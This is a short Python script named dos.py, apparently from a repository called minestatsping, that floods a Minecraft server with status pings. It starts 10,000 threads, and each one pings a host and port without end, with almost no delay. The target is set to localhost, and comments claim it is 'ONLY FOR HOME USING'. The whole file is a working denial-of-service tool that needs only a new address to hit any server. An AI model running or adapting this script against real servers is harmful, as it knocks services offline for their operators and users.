minestatsping/dos.py
2023-01-20 22:55:37 +03:00

20 lines
302 B
Python

#ONLY FOR HOME USING!!!
#NO PROXY
#NO NULLPING
from mctools import PINGClient
#My libraries
from time import sleep
import threading
def main():
ping = PINGClient('127.0.0.1', 25577)
while True:
sleep(0.00001)
ping.ping()
for i in range(10000):
th = threading.Thread(target=main)
th.start()